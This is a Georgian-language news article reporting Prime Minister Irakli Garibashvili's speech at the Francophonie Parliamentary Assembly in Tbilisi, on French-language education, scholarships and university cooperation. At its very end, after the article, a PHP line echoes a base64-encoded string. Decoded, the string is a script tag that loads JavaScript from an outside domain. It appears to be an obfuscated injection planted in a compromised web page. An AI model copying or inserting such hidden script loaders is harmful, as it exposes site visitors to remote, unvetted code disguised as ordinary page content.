celsiusi
ავერსი შნაიდერი

​ფრანკოფონიის საპატიო საპარლამენტო ასამბლეის თბილისში მიღება პრივილეგია და დიდი სიხარულია. საქართველოსთვის ეს პატივია და მინდა, მადლობა გადავუხადო პრეზიდენტს, ამ სესიის ორგანიზატორებს, არჩეულ წარმომადგენლებს საზოგადოების ყველა მიმართულებიდან, სხვადასხვა კონტინენტიდან და ასევე ჩვენს დეპუტატებს, რომლებსაც ჰქონდათ შესანიშნავი იდეა, ეს სხდომა ჩატარებულიყო თბილისში, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ფრანკოფონიის საპარლამენტო ასამბლეის სესიის გახსნაზე სიტყვით გამოსვლისას განაცხადა.

ღარიბაშვილის თქმით, საქართველოს, ამ ცნობილ ასამბლეაში დამკვირვებელ ქვეყანას, დიდწილად, განზოგადებული ფრანკოფილიის გარდა, ფრანკოფონიის ხანგრძლივი და მდიდარი ტრადიცია აქვს.

„საქართველოს ფრანგულენოვანი ოჯახი, რომლის ნაწილიც ვარ და ვამაყობ ამით, მიუხედავად მისი შედარებით მოკრძალებული ზომისა, უდავოდ არის მსოფლიოში ერთ-ერთი ყველაზე ენთუზიაზმით სავსე და დინამიკური. საფრანგეთში სწავლის შემდეგ ფრანგული ენა ჩემთვის განსაკუთრებით ძვირფასია. ვისარგებლებ შემთხვევით და მადლობას გადავუხდი ხელმძღვანელობას და გენერალურ სამდივნოს, ფრანკოფონიის საპარლამენტო ასამბლეის წევრებს იმ გამორჩეული ჯილდოსთვის, რომლითაც თქვენ პატივი დამდეთ გუშინ. პლეადის ორდენი უფრო მეტად მავალდებულებს, რომ ჩემს ქვეყანაში ფრანგული ენის სწავლებას ხელი შევუწყო, რათა „ფრანგული სიტყვები პლეადის ვარსკვლავებივით ათას შუქად ანათებდნენ“.

საქართველოში ნახავთ ინტერესს, უპირობო სიყვარულს ფრანგული და ფრანკოფონიური ლიტერატურის მიმართ. საქართველო არის ქვეყანა, სადაც ბევრს კითხულობენ, სადაც ბევრი წიგნი ითარგმნება, სადაც წიგნს აფასებენ. ამ კუთხით, მინდა, ხაზი გავუსვა ქართველი ფრანკოფონების, კერძოდ, ფრანგული რენესანსის ქართული დელეგაციისა და მისი პრეზიდენტის, საქართველოს ფრანკოფონიის და ზოგადად ფრანკოფონიის საყრდენის, ქ-ნი მზაღო დოხტურიშვილის მოღვაწეობის მნიშვნელობას. ემერიტუსის პროფესორი სამეცნიერო და კულტურული ფრანკოფონიის ძალიან ერთგულია. ფრანგულენოვანი ოჯახის შეკრების შემდეგ დაწესდა ქართული გონკურის პრემია ქართველი მკითხველის მიერ შერჩეული ფრანგულენოვანი ავტორების დასაჯილდოებლად. ამასთან, გამოცემა Agora სპეციალიზებულია ფრანგულენოვანი ნაწარმოებების ქართული თარგმანების რედაქტირებაში, ისევე როგორც ყველა სხვა გამომცემლობასა და სკოლაში, უნივერსიტეტებში, რომლებიც ეძღვნება ფრანგული ენის პოპულარიზაციას და განვითარებას, ფრანგული სკოლა – მთავარი სახლი და ემბლემური ადგილია ფრანგულენოვანი ადამიანებისთვის, უფრო მეტიც, ჩემი შვილები იქ სწავლობენ, რათა შევინარჩუნოთ ჩვენი ოჯახური ტრადიცია ფრანგულენოვანი სამყაროს შესახებ.

ჩვენი ხელოვანები, კინორეჟისორები და მეცნიერები, ისევე როგორც ჩვენი უახლესი წარსულიდან ამ სფეროების წარმომადგენელი დიდებული ადამიანები, ინარჩუნებენ ძალიან მჭიდრო კავშირებს საფრანგეთთან და ფრანგულენოვან სამყაროსთან, ჩამოაქვთ ცოდნა საქართველოში და აცნობენ მას საზღვარგარეთ. ასევე, ვემზადებით პარიზის წიგნის საერთაშორისო ბაზრობისთვის, სადაც საქართველო იქნება საპატიო სტუმარი ერთ-ერთ მომდევნო გამოცემაზე და წარადგენს თავისი ლიტერატურის, პოეზიისა და კულტურის საგანძურებს ფრანგულ ენაზე.

ჩვენმა მთავრობამ დააწესა სტიპენდიები ქართველი ახალგაზრდებისთვის, რომლებსაც სურთ, განათლება მიიღონ ფრანგულ და ფრანგულენოვან უნივერსიტეტებში, ჩვენ მათ ამის საშუალებას ვაძლევთ საფრანგეთის მთავრობასთან ერთად, თბილისში მათი საელჩოს მეშვეობით. განათლების საერთაშორისო ცენტრი გულდასმით ირჩევს სწავლისა და ტრენინგის მსურველ ახალგაზრდა კანდიდატებს, რათა მათ შემდეგ შეძლონ დიდ უნივერსიტეტებსა და საერთაშორისო სკოლებში შეძენილი ცოდნა საქართველოს საკეთილდღეოდ გამოიყენონ. ამ კონტექსტში, მინდა, მადლობა გადავუხადო ფრანკოფონიის საუნივერსიტეტო სააგენტოს (AUF) საქართველოში გაწეული საქმიანობისთვის.

გასულ წელს ხელი მოეწერა ჩარჩო ხელშეკრულებას AUF-სა და საქართველოს განათლების სამინისტროს შორის საქართველოში უმაღლესი განათლებისა და კვლევის განვითარებისა და თანამშრომლობის გაძლიერების მიზნით. ამ ჩარჩო შეთანხმების მეშვეობით, სამინისტრო, AUF-თან ერთად, მიზნად ისახავს, ხელი შეუწყოს უმაღლესი განათლების, კვლევებისა და ფრანგულენოვანი ინოვაციების განვითარებას. ეს შეთანხმება არის იმის კარგი მაგალითი, რომ ჩვენი მთავრობა მზად არის, განავითაროს სამეცნიერო ფრანკოფონია იმ ექვსი ქართული უნივერსიტეტის სასარგებლოდ, რომლებიც AUF-ის წევრები არიან. AUF-ის მხარდაჭერით, ქართველი სტუდენტები და მკვლევრები მონაწილეობენ საუნივერსიტეტო გაცვლით პროგრამებში ფრანკოფონიის წევრ ქვეყნებთან.

გარდა ამისა, მიმდინარეობს კიდევ ერთი სასწავლო პროექტი საგარეო საქმეთა სამინისტროსა და ფრანკოფონიის საერთაშორისო ორგანიზაციას (OIF) შორის „ეროვნული ფრანკოფონიური ინიციატივების“ (IFN) პროგრამის ფარგლებში – ქართველი დიპლომატების სასწავლო პროგრამა ფრანგულენოვანი დიპლომატების კორპუსის გასაძლიერებლად.

იმედი მაქვს, რომ ეს ღონისძიება ხელს შეუწყობს საქართველოს აღზევებას ფრანგულენოვან ოჯახში, ფრანგულის სწავლების გაძლიერებას ქართულ სკოლებში და ამით ამ ენის უფრო ხშირ გამოყენებას დიპლომატიასა და პოლიტიკურ წრეებში. ფრანკოფონია, ფრანკოფონიის საპარლამენტო ასამბლეაა, რომელიც შედგება ქალებისა და მამაკაცებისგან, რომლებმაც იციან მშვიდობის, თავისუფლებისა და სოლიდარობის ღირებულებების მნიშვნელობა; თქვენ ჩვენ გადმოგვცემთ ჩვენთვის ძვირფას ღირებულებებს, განსაკუთრებით, ამ რთულ პერიოდში მთელი მსოფლიოსთვის. საქართველო ამჟამად გადის დიდი გეოპოლიტიკური გამოწვევების პერიოდს, ამიტომ ჩვენი ვალია, გავიაროთ ეს ეტაპი სიბრძნით და მოთმინებით, ვიყოთ ფხიზლად, ვიმოქმედოთ გონიერებითა და წინდახედულებით, ვიზრუნოთ მშვიდობის შენარჩუნებაზე და მივცეთ ქვეყანას განვითარების შესაძლებლობა, რათა დაკმაყოფილდეს ჩვენი მოსახლეობის მოლოდინები“, – განაცხადა ირაკლი ღარიბაშვილმა. 

349
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");